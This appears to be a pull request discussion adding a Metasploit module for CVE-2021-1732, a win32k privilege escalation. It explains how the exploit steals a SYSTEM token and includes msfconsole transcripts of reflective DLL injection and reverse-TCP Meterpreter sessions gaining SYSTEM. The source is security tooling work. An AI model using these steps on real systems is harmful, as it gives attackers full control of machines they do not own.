Add exploit for CVE-2021-1732

[zeroSteiner]

This adds an exploit for CVE-2021-1732 which is a vulnerability in win32k. By calling NtUserConsoleControl in a callback function and passing the window that is currently being created, a field can be switched to an offset despite containing an attacker-controlled value. This is used to build read and write primitives to access kernel memory. Once build, the primitives are used to steal a SYSTEM token from PID 4.

In my testing the exploit is pretty reliable. When it does work, it fails gracefully and does not cause a BSOD though it is certainly theoretically possible that it could, I just haven't observed that behavior. I've tested this on all 6 affected versions of Windows 10 from 1803 through 20H2. I tested 1709 as well but the exploit does not appear to work for that one despite it supposedly being vulnerable. Version 1709 is no longer in service and is thus not listed by MSRC as an affected system.

From a user's perspective the exploitation process is pretty straight forward, there are no special options. The entire thing takes place in memory. Like many RDLL, exploits a process is created to host the DLL which is then elevated before the payload is executed. This logic is actually used in so many places that I moved it into a Mixin since it's copied and pasted among quite a few exploits.

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• Open an x64 Windows Meterpreter session on a supported target (Windows 10 1803-20H2)
• Run the check method, make sure it's reported as appears to be vulnerable
• Run the exploit, get an elevated session back

msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: DESKTOP-JKM0HAD\aliddle
meterpreter > sysinfo
Computer        : DESKTOP-JKM0HAD
OS              : Windows 10 (10.0 Build 19042).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > background 
[*] Backgrounding session 1...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/local/cve_2021_1732_win32k 
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2021_1732_win32k) > set SESSION -1
SESSION => -1
msf6 exploit(windows/local/cve_2021_1732_win32k) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2021_1732_win32k) > set LHOST 192.168.159.128 
LHOST => 192.168.159.128
msf6 exploit(windows/local/cve_2021_1732_win32k) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Launching notepad to host the DLL...
[+] Process 7672 launched.
[*] Reflectively injecting the DLL into 7672...
[*] Sending stage (200262 bytes) to 192.168.159.66
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.66:60838) at 2021-03-15 17:56:28 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

[bwatters-r7]

Disregard the handler bind and module failures- I already had a listener running.

msf6 exploit(windows/local/cve_2021_1732_win32k) > run

[-] Handler failed to bind to 192.168.135.197:4567:-  -
[-] Handler failed to bind to 0.0.0.0:4567:-  -
[*] Executing automatic check (disable AutoCheck to override)
[*] Windows Build Number = 17134
[+] The target appears to be vulnerable.
[*] Launching notepad to host the DLL...
[+] Process 8728 launched.
[*] Reflectively injecting the DLL into 8728...
[*] Sending stage (200262 bytes) to 192.168.132.125
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 2 opened (192.168.135.197:4567 -> 192.168.132.125:49680) at 2021-03-18 14:06:26 -0500

[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/cve_2021_1732_win32k) > 
msf6 exploit(windows/local/cve_2021_1732_win32k) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > uid
[-] Unknown command: uid.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

[bwatters-r7]

Release Notes

New module exploits/windows/local/cve_2021_1732_win32k achieves privilege escalation on vulnerable win32k targets via CVE-2021-1732.

[timwr]

Is this 100% reliable for you guys? It seems about 30% reliable for me on Windows 10 (10.0 Build 18363).

[bwatters-r7]

I tried it about 6-7 times, and it only failed once? In that one case, I was able to just run it again, and it worked.
I'm using the VM from above, so Windows 10x64 Release 1803.

[timwr]

Since it's really quick and doesn't seem to bsod (or have any side effects), I was tempted to wrap the exploit in a for loop (so it tries multiple times until succeeding), but manually re-running probably makes more sense. Nice work btw!

[zeroSteiner]

Yeah it wasn't exactly 100% reliable for me either but my thought was that it was "good enough" for GoodRanking, especially since the behavior I saw was like what Brendan described and that it did not trigger a BSOD on the remote system.